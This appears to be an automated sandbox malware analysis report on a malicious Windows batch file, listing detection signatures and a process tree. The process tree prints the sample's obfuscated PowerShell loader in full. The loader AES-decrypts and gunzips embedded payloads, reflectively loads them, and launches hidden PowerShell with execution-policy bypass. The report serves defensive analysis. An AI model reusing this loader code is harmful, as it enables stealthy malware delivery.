Windows
Analysis Report
upload.cmd
Overview
General Information
Detection
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Snort IDS alert for network traffic
Yara detected Powershell decode and execute
Bypasses PowerShell execution policy
Obfuscated command line found
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
cmd.exe (PID: 7040 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\uploa d.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 6188 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 5536 cmdline:
cmd /c "se t __=^&rem " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) cmd.exe (PID: 3260 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho functio n decrypt_ function($ param_var) { $aes_var =[System.S ecurity.Cr yptography .Aes]::Cre ate(); $ae s_var.Mode =[System.S ecurity.Cr yptography .CipherMod e]::CBC; $ aes_var.Pa dding=[Sys tem.Securi ty.Cryptog raphy.Padd ingMode]:: PKCS7; $ae s_var.Key= [System.Co nvert]::(' gnirtS46es aBmorF'[-1 ..-16] -jo in '')('Rz MoOoy2Kqgk Iwy4RoRfj6 IIwcpdKf2H W9dVyZHQs4 E='); $aes _var.IV=[S ystem.Conv ert]::('gn irtS46esaB morF'[-1.. -16] -join '')('Au8m inHRY/Rn0X wxZshhqQ== '); $decry ptor_var=$ aes_var.Cr eateDecryp tor(); $re turn_var=$ decryptor_ var.Transf ormFinalBl ock($param _var, 0, $ param_var. Length); $ decryptor_ var.Dispos e(); $aes_ var.Dispos e(); $retu rn_var;}fu nction dec ompress_fu nction($pa ram_var){ $gKmLj=New -Object Sy stem.IO.Me moryStream (,$param_v ar); $CUzz M=New-Obje ct System. IO.MemoryS tream; $xK htn=New-Ob ject Syste m.IO.Compr ession.GZi pStream($g KmLj, [IO. Compressio n.Compress ionMode]:: Decompress ); $xKhtn. CopyTo($CU zzM); $xKh tn.Dispose (); $gKmLj .Dispose() ; $CUzzM.D ispose(); $CUzzM.ToA rray();}fu nction exe cute_funct ion($param _var,$para m2_var){ $ DUmer=[Sys tem.Reflec tion.Assem bly]::('da oL'[-1..-4 ] -join '' )([byte[]] $param_var ); $qdtAj= $DUmer.Ent ryPoint; $ qdtAj.Invo ke($null, $param2_va r);}$eQNwc = 'C:\Use rs\user\De sktop\uplo ad.cmd';$h ost.UI.Raw UI.WindowT itle = $eQ Nwc;$JWNvA =[System.I O.File]::( 'txeTllAda eR'[-1..-1 1] -join ' ')($eQNwc) .Split([En vironment] ::NewLine) ;foreach ( $gHmIc in $JWNvA) { if ($gHmIc .StartsWit h('oyDvWzH HEgVkFmqgI mzX')) { $ PFglM=$gHm Ic.Substri ng(20); br eak; }}$pa yloads_var =[string[] ]$PFglM.Sp lit('\');$ payload1_v ar=decompr ess_functi on (decryp t_function ([Convert ]::('gnirt S46esaBmor F'[-1..-16 ] -join '' )($payload s_var[0].R eplace('#' , '/').Rep lace('@', 'A'))));$p ayload2_va r=decompre ss_functio n (decrypt _function ([Convert] ::('gnirtS 46esaBmorF '[-1..-16] -join '') ($payloads _var[1].Re place('#', '/').Repl ace('@', ' A'))));exe cute_funct ion $paylo ad1_var $n ull;execut e_function $payload2 _var (,[st ring[]] (' ')); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) powershell.exe (PID: 5212 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s MD5: 04029E121A0CFA5991749937DD22A1D9) wermgr.exe (PID: 6340 cmdline:
"C:\Window s\system32 \wermgr.ex e" "-outpr oc" "0" "5 212" "2620 " "1284" " 2624" "0" "0" "2628" "0" "0" " 0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Jonathan Cheong, oscd.community: |